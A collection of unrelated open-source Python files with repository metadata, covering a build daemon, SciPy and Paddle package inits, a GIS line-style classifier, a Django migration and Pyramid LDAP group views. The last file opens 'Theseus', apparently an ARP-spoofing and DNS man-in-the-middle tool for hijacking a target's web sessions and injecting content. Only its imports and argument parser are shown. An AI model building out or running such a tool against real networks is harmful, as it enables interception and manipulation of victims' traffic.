if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise self.RuntimeFailure('service failure for {}, shutting down!'.format(service))
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
"""Synchronously run pantsd."""
# Switch log output to the daemon's log stream from here forward.
log_stream = self._setup_logging(self._log_level)
self._exiter.set_except_hook(log_stream)
self._logger.info('pantsd starting, log level is {}'.format(self._log_level))
self._native.set_panic_handler()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title('pantsd [{}]'.format(self._build_root))
# Write service socket information to .pids.
self._write_named_sockets(self._socket_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemon_spawn()."""
entry_point = '{}:launch'.format(__name__)
exec_env = combined_dict(os.environ, dict(PANTS_ENTRYPOINT=entry_point))
# Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
cmd = [sys.executable] + sys.argv
self._logger.debug('cmd is: PANTS_ENTRYPOINT={} {}'.format(entry_point, ' '.join(cmd)))
# TODO: Improve error handling on launch failures.
os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def maybe_launch(self):
"""Launches pantsd (if not already running) in a subprocess.
:returns: The port that pantsd is listening on.
:rtype: int
"""
self.watchman_launcher.maybe_launch()
self._logger.debug('acquiring lock: {}'.format(self.process_lock))
with self.process_lock:
new_fingerprint = self.options_fingerprint
self._logger.debug('pantsd: is_alive={} new_fingerprint={} current_fingerprint={}'
.format(self.is_alive(), new_fingerprint, self.fingerprint))
if self.needs_restart(new_fingerprint):
self.terminate(include_watchman=False)
self._logger.debug('launching pantsd')
self.daemon_spawn()
# Wait up to 10 seconds for pantsd to write its pidfile so we can display the pid to the user.
self.await_pid(10)
listening_port = self.read_named_socket('pailgun', int)
pantsd_pid = self.pid
self._logger.debug('released lock: {}'.format(self.process_lock))
self._logger.debug('pantsd is running at pid {}, pailgun port is {}'
.format(pantsd_pid, listening_port))
return listening_port
def terminate(self, include_watchman=True):
"""Terminates pantsd and watchman."""
super(PantsDaemon, self).terminate()
if include_watchman:
self.watchman_launcher.terminate()
def launch():
"""An external entrypoint that spawns a new pantsd instance."""
PantsDaemon.Factory.create().run_sync()
|
{
"content_hash": "d74314b1aeeeddd133baed3d7033c3d5",
"timestamp": "",
"source": "github",
"line_count": 325,
"max_line_length": 104,
"avg_line_length": 37.92307692307692,
"alnum_prop": 0.6906288032454361,
"repo_name": "fkorotkov/pants",
"id": "c97e0c444a20cd22b32305212d4a85b266430c21",
"size": "12472",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/pants/pantsd/pants_daemon.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "781"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "1805"
},
{
"name": "HTML",
"bytes": "79866"
},
{
"name": "Java",
"bytes": "481460"
},
{
"name": "JavaScript",
"bytes": "35417"
},
{
"name": "Python",
"bytes": "5931594"
},
{
"name": "Rust",
"bytes": "271643"
},
{
"name": "Scala",
"bytes": "76239"
},
{
"name": "Shell",
"bytes": "74734"
},
{
"name": "Thrift",
"bytes": "2795"
}
],
"symlink_target": ""
}
|
from .send_recv import send_u_recv # noqa: F401
from .send_recv import send_ue_recv # noqa: F401
from .send_recv import send_uv # noqa: F401
__all__ = []
|
{
"content_hash": "0abba27474780c778b8341500060559b",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 49,
"avg_line_length": 31.6,
"alnum_prop": 0.6708860759493671,
"repo_name": "PaddlePaddle/Paddle",
"id": "c07f9bc40c6b39967ed168afb11928eb2ba1d635",
"size": "769",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "python/paddle/geometric/message_passing/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "58544"
},
{
"name": "C",
"bytes": "210300"
},
{
"name": "C++",
"bytes": "36848680"
},
{
"name": "CMake",
"bytes": "902619"
},
{
"name": "Cuda",
"bytes": "5227207"
},
{
"name": "Dockerfile",
"bytes": "4361"
},
{
"name": "Go",
"bytes": "49796"
},
{
"name": "Java",
"bytes": "16630"
},
{
"name": "Jinja",
"bytes": "23852"
},
{
"name": "MLIR",
"bytes": "39982"
},
{
"name": "Python",
"bytes": "36203874"
},
{
"name": "R",
"bytes": "1332"
},
{
"name": "Shell",
"bytes": "553177"
}
],
"symlink_target": ""
}
|
"""
=================================================
Orthogonal distance regression (:mod:`scipy.odr`)
=================================================
.. currentmodule:: scipy.odr
Package Content
===============
.. autosummary::
:toctree: generated/
Data -- The data to fit.
RealData -- Data with weights as actual std. dev.s and/or covariances.
Model -- Stores information about the function to be fit.
ODR -- Gathers all info & manages the main fitting routine.
Output -- Result from the fit.
odr -- Low-level function for ODR.
OdrWarning -- Warning about potential problems when running ODR
OdrError -- Error exception.
OdrStop -- Stop exception.
Prebuilt models:
.. autosummary::
polynomial
.. data:: exponential
.. data:: multilinear
.. data:: unilinear
.. data:: quadratic
.. data:: polynomial
Usage information
=================
Introduction
------------
Why Orthogonal Distance Regression (ODR)? Sometimes one has
measurement errors in the explanatory (a.k.a., "independent")
variable(s), not just the response (a.k.a., "dependent") variable(s).
Ordinary Least Squares (OLS) fitting procedures treat the data for
explanatory variables as fixed, i.e., not subject to error of any kind.
Furthermore, OLS procedures require that the response variables be an
explicit function of the explanatory variables; sometimes making the
equation explicit is impractical and/or introduces errors. ODR can
handle both of these cases with ease, and can even reduce to the OLS
case if that is sufficient for the problem.
ODRPACK is a FORTRAN-77 library for performing ODR with possibly
non-linear fitting functions. It uses a modified trust-region
Levenberg-Marquardt-type algorithm [1]_ to estimate the function
parameters. The fitting functions are provided by Python functions
operating on NumPy arrays. The required derivatives may be provided
by Python functions as well, or may be estimated numerically. ODRPACK
can do explicit or implicit ODR fits, or it can do OLS. Input and
output variables may be multi-dimensional. Weights can be provided to
account for different variances of the observations, and even
covariances between dimensions of the variables.
The `scipy.odr` package offers an object-oriented interface to
ODRPACK, in addition to the low-level `odr` function.
Additional background information about ODRPACK can be found in the
`ODRPACK User's Guide
<https://docs.scipy.org/doc/external/odrpack_guide.pdf>`_, reading
which is recommended.
Basic usage
-----------
1. Define the function you want to fit against.::
def f(B, x):
'''Linear function y = m*x + b'''
# B is a vector of the parameters.
# x is an array of the current x values.
# x is in the same format as the x passed to Data or RealData.
#
# Return an array in the same format as y passed to Data or RealData.
return B[0]*x + B[1]
2. Create a Model.::
linear = Model(f)
3. Create a Data or RealData instance.::
mydata = Data(x, y, wd=1./power(sx,2), we=1./power(sy,2))
or, when the actual covariances are known::
mydata = RealData(x, y, sx=sx, sy=sy)
4. Instantiate ODR with your data, model and initial parameter estimate.::
myodr = ODR(mydata, linear, beta0=[1., 2.])
5. Run the fit.::
myoutput = myodr.run()
6. Examine output.::
myoutput.pprint()
References
----------
.. [1] P. T. Boggs and J. E. Rogers, "Orthogonal Distance Regression,"
in "Statistical analysis of measurement error models and
applications: proceedings of the AMS-IMS-SIAM joint summer research
conference held June 10-16, 1989," Contemporary Mathematics,
vol. 112, pg. 186, 1990.
"""
# version: 0.7
# author: Robert Kern <robert.kern@gmail.com>
# date: 2006-09-21
from __future__ import division, print_function, absolute_import
from .odrpack import *
from .models import *
from . import add_newdocs
__all__ = [s for s in dir()
if not (s.startswith('_') or s in ('odr_stop', 'odr_error'))]
from scipy._lib._testutils import PytestTester
test = PytestTester(__name__)
del PytestTester
|
{
"content_hash": "960434f474d996abcbc81a3346fa97f7",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 80,
"avg_line_length": 30.228571428571428,
"alnum_prop": 0.6732041587901701,
"repo_name": "lhilt/scipy",
"id": "f504937eb11e5bde9a8ddfce6ce6de6d5d07e9fb",
"size": "4232",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "scipy/odr/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4396416"
},
{
"name": "C++",
"bytes": "643592"
},
{
"name": "Fortran",
"bytes": "5368331"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12378541"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
}
|
import arcpy
import os
import logging
logger = logging.getLogger("style_debug")
#-------------------------------------------------------------------------------
# Calculates the style code value
def CalculateStyleCode(row):
descTerm = row[3]
descGroup = row[4]
make = row[5]
physicalPres = row[6]
returnVal = 99
if descTerm is None:
descTerm = ""
if descGroup is None:
descGroup = ""
if (descTerm == "Polygon Closing Link"):
returnVal = 1
elif (descTerm == "Inferred Property Closing Link"):
returnVal = 2
elif (descTerm == "Bottom Of Slope"):
returnVal = 3
elif (descTerm == "Top Of Slope"):
returnVal = 4
elif (descTerm == "Step"):
returnVal = 5
elif (descTerm is not None and descTerm.find("Mean High Water (Springs)") > -1):
returnVal = 6
elif (descTerm == "Traffic Calming"):
returnVal = 7
elif (descTerm == "Standard Gauge Track"):
returnVal = 8
elif (descTerm == "Bottom Of Cliff"):
returnVal = 9
elif (descTerm == "Top Of Cliff"):
returnVal = 10
elif (descTerm == "Mean Low Water (Springs)"):
returnVal = 11
elif (descTerm == "Unmade Path Alignment"):
returnVal = 12
elif (descTerm is not None and descTerm.find("Overhead Construction") > -1):
returnVal = 13
elif (descTerm == "Culvert"):
returnVal = 14
elif (descTerm == "Pylon"):
returnVal = 15
elif (descTerm == "Ridge Or Rock Line"):
returnVal = 16
elif (descTerm == "Narrow Gauge"):
returnVal = 17
elif (descTerm == "Buffer"):
returnVal = 18
elif (descTerm == "Tunnel Edge"):
returnVal = 19
elif (descTerm is not None and descTerm.find("Line Of Posts") > -1):
returnVal = 20
elif (descTerm == "Drain"):
returnVal = 21
elif (descTerm == "Normal Tidal Limit"):
returnVal = 22
# Descriptive group rules
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres != "Edge / Limit"):
returnVal = 23
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Obstructing"):
returnVal = 24
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres == "Edge / Limit"):
returnVal = 25
elif (descGroup == "Road Or Track"):
returnVal = 26
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Division" and physicalPres == "Obstructing"):
returnVal = 27
elif (descGroup == "Inland Water"):
returnVal = 28
elif (descGroup is not None and descGroup.find("General Surface") > -1 and make == "Natural"):
returnVal = 29
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Overhead"):
returnVal = 30
elif (descGroup == "Landform" and make == "Natural"):
returnVal = 31
elif (descGroup == "Historic Interest"):
returnVal = 32
elif (descGroup == "Landform" and make == "Manmade"):
returnVal = 33
else:
returnVal = 99
logger.debug("Style Code:"+ str(returnVal))
return returnVal
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Calculates the style description value
def CalculateStyleDescription(row):
descTerm = row[3]
descGroup = row[4]
make = row[5]
physicalPres = row[6]
returnVal = "Unclassified"
if descTerm is None:
descTerm = ""
if descGroup is None:
descGroup = ""
if (descTerm == "Polygon Closing Link"):
returnVal = "Polygon Closing Line"
elif (descTerm == "Inferred Property Closing Link"):
returnVal = "Property Closing Line"
elif (descTerm == "Bottom Of Slope"):
returnVal = "Bottom Of Slope Line"
elif (descTerm == "Top Of Slope"):
returnVal = "Top Of Slope Line"
elif (descTerm == "Step"):
returnVal = "Step Line"
elif (descTerm is not None and descTerm.find("Mean High Water (Springs)") > -1):
returnVal = "Mean High Water Line"
elif (descTerm == "Traffic Calming"):
returnVal = "Traffic Calming Line"
elif (descTerm == "Standard Gauge Track"):
returnVal = "Standard Gauge Track Line"
elif (descTerm == "Bottom Of Cliff"):
returnVal = "Bottom Of Cliff Line"
elif (descTerm == "Top Of Cliff"):
returnVal = "Top Of Cliff Line"
elif (descTerm == "Mean Low Water (Springs)"):
returnVal = "Mean Low Water Line"
elif (descTerm == "Unmade Path Alignment"):
returnVal = "Path Line"
elif (descTerm is not None and descTerm.find("Overhead Construction") > -1):
returnVal = "Overhead Construction Line"
elif (descTerm == "Culvert"):
returnVal = "Culvert Line"
elif (descTerm == "Pylon"):
returnVal = "Pylon Line"
elif (descTerm == "Ridge Or Rock Line"):
returnVal = "Ridge Or Rock Line"
elif (descTerm == "Narrow Gauge"):
returnVal = "Narrow Gauge Line"
elif (descTerm == "Buffer"):
returnVal = "Railway Buffer Line"
elif (descTerm == "Tunnel Edge"):
returnVal = "Tunnel Edge Line"
elif (descTerm is not None and descTerm.find("Line Of Posts") > -1):
returnVal = "Line Of Posts Line"
elif (descTerm == "Drain"):
returnVal = "Drain Line"
elif (descTerm == "Normal Tidal Limit"):
returnVal = "Normal Tidal Limit Line"
# Descriptive group rules
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres != "Edge / Limit"):
returnVal = "Default Line"
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Obstructing"):
returnVal = "Building Outline Line"
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres == "Edge / Limit"):
returnVal = "Edge Line"
elif (descGroup == "Road Or Track"):
returnVal = "Road Or Track Line"
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Division" and physicalPres == "Obstructing"):
returnVal = "Building Division Line"
elif (descGroup == "Inland Water"):
returnVal = "Inland Water Line"
elif (descGroup is not None and descGroup.find("General Surface") > -1 and make == "Natural"):
returnVal = "General Surface Natural Line"
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Overhead"):
returnVal = "Building Overhead Line"
elif (descGroup == "Landform" and make == "Natural"):
returnVal = "Landform Natural Line"
elif (descGroup == "Historic Interest"):
returnVal = "Historic Interest Line"
elif (descGroup == "Landform" and make == "Manmade"):
returnVal = "Landform Manmade Line"
else:
returnVal = "Unclassified"
logger.debug("Style Description:"+ returnVal)
return returnVal;
#-------------------------------------------------------------------------------
|
{
"content_hash": "332bf967a09ff6f12c7569be7ed08bf8",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 130,
"avg_line_length": 37.72680412371134,
"alnum_prop": 0.5879218472468917,
"repo_name": "AstunTechnology/Loader",
"id": "01ee95f163130325730425ff312fc6151cdefbfe",
"size": "7676",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "python/osmm_topo_style/line_style.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7046"
},
{
"name": "PLpgSQL",
"bytes": "2732"
},
{
"name": "Python",
"bytes": "80515"
}
],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Build.state'
db.add_column('builds_build', 'state',
self.gf('django.db.models.fields.CharField')(default='finished', max_length=55),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Build.state'
db.delete_column('builds_build', 'state')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'builds.build': {
'Meta': {'ordering': "['-date']", 'object_name': 'Build'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'error': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'output': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'builds'", 'to': "orm['projects.Project']"}),
'setup': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'setup_error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'finished'", 'max_length': '55'}),
'success': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'version': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'builds'", 'null': 'True', 'to': "orm['builds.Version']"})
},
'builds.version': {
'Meta': {'ordering': "['-verbose_name']", 'unique_together': "[('project', 'slug')]", 'object_name': 'Version'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'built': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'versions'", 'to': "orm['projects.Project']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'uploaded': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'builds.versionalias': {
'Meta': {'object_name': 'VersionAlias'},
'from_slug': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'largest': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'aliases'", 'to': "orm['projects.Project']"}),
'to_slug': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'projects.project': {
'Meta': {'ordering': "('slug',)", 'object_name': 'Project'},
'analytics_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'copyright': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'crate_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'default_branch': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_version': ('django.db.models.fields.CharField', [], {'default': "'latest'", 'max_length': '255'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'django_packages_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'documentation_type': ('django.db.models.fields.CharField', [], {'default': "'sphinx'", 'max_length': '20'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'related_projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['projects.Project']", 'null': 'True', 'through': "orm['projects.ProjectRelationship']", 'blank': 'True'}),
'repo': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'repo_type': ('django.db.models.fields.CharField', [], {'default': "'git'", 'max_length': '10'}),
'requirements_file': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'skip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "'.rst'", 'max_length': '10'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '20'}),
'use_virtualenv': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
'projects.projectrelationship': {
'Meta': {'object_name': 'ProjectRelationship'},
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'superprojects'", 'to': "orm['projects.Project']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subprojects'", 'to': "orm['projects.Project']"})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['builds']
|
{
"content_hash": "30972241f13769161d48eee00c082602",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 230,
"avg_line_length": 79.08695652173913,
"alnum_prop": 0.5488363569726956,
"repo_name": "sils1297/readthedocs.org",
"id": "6b9dfeea59d6cceffba2e7ba84882b350cbae20d",
"size": "10938",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "readthedocs/builds/migrations/0013_add_state_field.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4515"
},
{
"name": "CSS",
"bytes": "65340"
},
{
"name": "HTML",
"bytes": "213352"
},
{
"name": "JavaScript",
"bytes": "1437939"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "1459496"
},
{
"name": "Shell",
"bytes": "492"
}
],
"symlink_target": ""
}
|
from pyramid.view import view_config
from pyramid import httpexceptions as exception
from ..juliette.modelGroup import Grupo
from ..juliette.excepciones import DatosException, ConflictoException
from ..schemas.grupos import EsquemaGrupo
import logging
log = logging.getLogger(__name__)
@view_config(route_name="grupos_creacion", renderer='json', permission='creacion')
def grupos_creacion(peticion):
# Validando datos recibidos
try:
v = EsquemaGrupo('cn')
contenido = v.validacion(peticion.json_body['corpus'])
except KeyError as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except ValueError as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except TypeError as e:
# Se refiere a que no se hayan enviado datos json correctamente formateados
log.warning(e)
return exception.HTTPBadRequest(e)
except DatosException as e:
log.warning(e)
return exception.HTTPBadRequest(e)
# Realizamos la operacion Creacion de Usuarios mediante la librería
try:
grupo = Grupo()
cn_grupo = contenido['cn'].encode('ascii')
contenido = grupo.crear(cn_grupo, contenido)
except ConflictoException as e:
# Si el grupo ya existe, devolvemos un 409 Conflict
log.warning(e)
return exception.HTTPConflict(e)
except DatosException as e:
log.warning('key error')
log.warning(e)
return exception.HTTPBadRequest(e)
# La siguiente parece ser LA FORMA de responder en este caso
# TODO: Sin embargo, mi response en este caso esta vació cuando se llama con un Request creado vacío
peticion.response.status_code = 201
peticion.response.headerlist.extend(
(
('Location', "grupos/%s" % str(cn_grupo)),
)
)
return {'mensaje': contenido}
@view_config(route_name='grupos_listado', renderer='json', permission='listar')
def grupos_listado(peticion):
try:
grupo = Grupo()
contenido = grupo.obtener()
except Exception as e:
log.error(e)
return exception.HTTPInternalServerError()
print contenido
return contenido
@view_config(route_name='grupos_listado_options', renderer='json')
def grupos_listado_options(peticion):
pass
@view_config(route_name='grupos_detalle', renderer='json')
def grupos_detalle (peticion):
try:
uid = peticion.matchdict['grupo']
except KeyError as e:
return exception.HTTPBadRequest()
# Realizamos la operación Detalle de Usuarios mediante la librería
try:
grupo = Grupo()
contenido = grupo.obtener(uid)
except DatosException as e:
return exception.HTTPNotFound()
except Exception as e:
log.error(e)
return exception.HTTPInternalServerError()
return {'mensaje': contenido}
@view_config(route_name='grupos_borrado', renderer='json', permission='borrado')
def grupos_borrado(peticion):
# Validando datos recibidos
try:
v = EsquemaGrupo()
cn_grupo = peticion.matchdict['grupo']
except KeyError as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except TypeError as e:
# Se refiere a que no se hayan enviado datos json correctamente formateados
log.warning(e)
return exception.HTTPBadRequest(e)
except DatosException as e:
log.warning(e)
return exception.HTTPBadRequest(e)
# Realizamos la operacion Borrado de Grupos mediante la librería
try:
grupo = Grupo()
contenido = grupo.borrar(cn_grupo)
except ConflictoException as e:
# En este caso, conflicto viene a decir que no existe
log.warning(e)
return exception.HTTPNotFound(e)
except DatosException as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except Exception as e:
log.error(e)
return exception.HTTPInternalServerError(e)
return {'mensaje': contenido}
|
{
"content_hash": "ade2a3ff7f8143e5667fc0b66c867d2b",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 104,
"avg_line_length": 31.984126984126984,
"alnum_prop": 0.6669975186104219,
"repo_name": "VTacius/justine",
"id": "f259fc7ceea2e9f4dfcd973c0c99d94665ab5d04",
"size": "4053",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "justine/views/grupos.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "77124"
}
],
"symlink_target": ""
}
|
from .cube import HoloCube # noqa (API import)
from .geo import (GeoElement, GeoFeature, GeoTiles, # noqa (API import)
WMTS, Points, Image, Text, Contours)
|
{
"content_hash": "250bb405173a91c454c382ef3129cf9e",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 75,
"avg_line_length": 69,
"alnum_prop": 0.5603864734299517,
"repo_name": "ContinuumIO/cube-explorer",
"id": "da5bbb4e4cbfe6c8f3d7c2f591fa3a3ef2f5619b",
"size": "207",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "holocube/element/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "38502"
},
{
"name": "Python",
"bytes": "26601"
}
],
"symlink_target": ""
}
|
import os
import re
import sys
import socket
import argparse
import threading
import multiprocessing
from arp.arp import Arp_Spoof
from logger.logger import Logger
from arp.ping import Arp_Ping
from banner.banner import New_Banner
from server.server import HTTP_Server
from dns.dns import Decode_Packet, DNS_Server
class Theseus(object):
"""Theseus Control A Victims Web Sessions"""
def __init__(self):
global args, arp, http_Server, ssl_Server, local, router, verbose, html_file, cfg, bhttp, bssl, payloads_folder, log, tm
super(Theseus, self).__init__()
log = Logger()
ap = argparse.ArgumentParser(description="Theseus", add_help=True)
ap.add_argument("--target", help="This is the targets ip address", required=True)
ap.add_argument("--iface", help="This is the network cards current interface", required=True)
ap.add_argument("--gateway", help="This is the routers ip address", required=True)
ap.add_argument("--verbose", help="This is the time interval between the arp packets", required=False)
ap.add_argument("--target-mac", help="This is the targets mac address", required=False)
ap.add_argument('--arp-ping', action='store_const', const=sum, help='This will get the targets mac address via a discret arp ping')
ap.add_argument('--force-content', action='store_const', const=sum, help='This option will force a custom website into each session')
